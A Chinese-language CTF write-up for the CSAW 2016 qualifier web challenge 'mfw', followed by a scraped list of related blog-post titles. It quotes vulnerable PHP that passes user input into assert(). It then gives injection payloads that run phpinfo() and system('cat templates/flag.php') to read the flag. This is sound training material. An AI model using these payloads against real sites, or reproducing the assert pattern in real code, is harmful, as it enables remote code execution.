[ctf web][csaw-ctf-2016-quals]mfw writeup
[csaw-ctf-2016-quals]mfw
知识点:
assert构造执行php函数
命令执行
wp
git泄露,得到index.php和flag.php(git下来的里面没有东西,推测这是要读取的文件)
index.php
<?phpif (isset($_GET['page'])) {$page = $_GET['page'];
} else {$page = "home";
}$file = "templates/" . $page . ".php";// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");?>html代码<?phprequire_once $file;
?>
首先对strpos函数进行闭合,构造一下,page=')
可以把后面', '..') === false
的给注释掉,构造page=').phpinfo();//
,可以得到回显
index.php?page=').phpinfo();//
?page='.phpinfo().' #不闭合也可以第一个payload相当于:
assert("strpos('templates/').phpinfo();//.php', '..') === false") or die("Detected hacking attempt!");
但是后面执行命令的时候必须要闭合…不知道为什么【可以了,是f12看不到,要查看源代码才行
?page=').system("cat templates/flag.php");//
?page='.system("cat templates/flag.php").'
[ctf web][csaw-ctf-2016-quals]mfw writeup相关推荐
- CSAW CTF 2016 PWN quals-warmup
CSAW CTF 2016 PWN quals-warmup 原文链接 先对文件有个大致的了解,是64位ELF文件 ☁ csaw ctf 2016 quals-warmup ls exp.py fla ...
- CTF Web题 部分WP
1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002 ...
- CTF Web学习(三)----python脚本的编写及应用
CTF Web学习(三) python脚本的编写及应用 CTF Web学习目录链接 CTF Web学习(一):基础篇及头文件修改.隐藏 CTF Web学习(二):代码审计.burp suite应用 C ...
- ctf web必备工具_设计人员和开发人员的必备Web工具和服务
ctf web必备工具 I cannot imagine that in 2018 there are people who don't use daily several web tools and ...
- CTF·WEB入门之路
Hello~大家好,这里是KOKO师傅! 对于初学者来说,打CTF之路仿佛是摸石头过河,而今天这篇文章则是一篇"从入门到入土"级别的概括类文章.从这篇文章中你可以了解到CTF的一些 ...
- CTF Web入门 命令执行 笔记
CTF Web入门 命令执行 eval(读取命令),但各种字符被ban if(!pregmatch("...",$c)) #指过滤了...eval($c); 这时候可以尝试 ?c= ...
- CTF Web方向考点总结
CTF Web 0X00 前言 做题已经快四个月了,接触了大大小小的题型,收藏的大师傅们的解题思路.题型总结的博客已经很多了,每次都要一个一个翻很麻烦,于是写下了这一个总结,实际上是把各大博客内容汇总 ...
- CTF——web个人总结
CTF web个人总结 仅供个人参考 从0开始接触到了CTF,算是入门了,为了方便自己做题,现在记录一下web类型题目的解题思路. 目录 CTF web个人总结 工具(含后渗透) 解题思路 一.普通思 ...
- 2021年云南省职工职业技能大赛CTF流量分析题(wireshark)WriteUp
2021年云南省职工职业技能大赛CTF流量分析题(wireshark)WriteUp .0x00 前言 本人作为业余爱好者参加了2021年云南省职工职业技能大赛的网络安全比赛,比赛形式以CTF+理论考 ...
- 从0到1学习CTF WEB
从0到1学习CTF WEB web前置技能 信息泄漏 密码口令 SQL注入 基础比较薄弱,准备逐题刷CTFHub的web类型题目顺便学习一下web方面的安全知识. web前置技能 1.请求方式: 隐藏 ...
最新文章
- pytroch 数据增量 transforms的二十二个方法
- 在load事件中关闭窗体
- Djang(在前端仿DjangoAdmin同样效果)
- Android--Activity的跳转及Activity之间的数据传递
- C++ 逆向笔记12 call和堆栈平衡
- 【暑期每日一题】洛谷 P6437 [COCI2011-2012#6] JACK
- 如何在 Word 的方框中打勾 √ ?☑ ☒
- 模式识别和机器视觉智能方面的论文投稿---国际著名期刊杂志论文投稿
- 新型搜索引擎Blekko欲赶超谷歌 再获3000万美元投资
- 树莓派如何接硬盘_树莓派3 挂载外接硬盘
- 微软账号登陆不上_微软抛弃“亲生儿子”,IE浏览器被限制,强制你更换Edge
- 《MySQL是怎么样运行的》读书笔记一 数据页+索引
- Ubuntu wine QQ 微信乱码
- 免费申请Jetbrains的产品
- 我对M4A文件格式的理解
- AForge学习笔记(3):AForge.Fuzzy
- 面向对象程序设计课程设计:利用决策树方法判定西瓜质量
- Android手机通过USB线共享电脑的网络上网
- 增加b格的win10快捷键(入门)入门增加效率
- linux id和iduser,su userid 和 su - userid的区别
热门文章
- 简单 黑苹果dsdt教程_提取DSDT和SSDT教程
- 数学三大危机与无穷小微积分
- 从零开始修炼电脑维修秘籍
- c++ 函数之间 传递向量_将向量传递给C ++中的函数
- 论文研读-社交媒体可视化-大规模地理社交媒体数据的可视化抽象与探索
- 郭德纲家训--话糙理不糙
- nodejs获取当前连接的网络ip
- 爬虫第3课 -豆瓣TOP250电影爬取
- [INFO] Using ‘UTF-8‘ encoding to copy filtered resources.错误
- OBD(On-Board-Diagnose)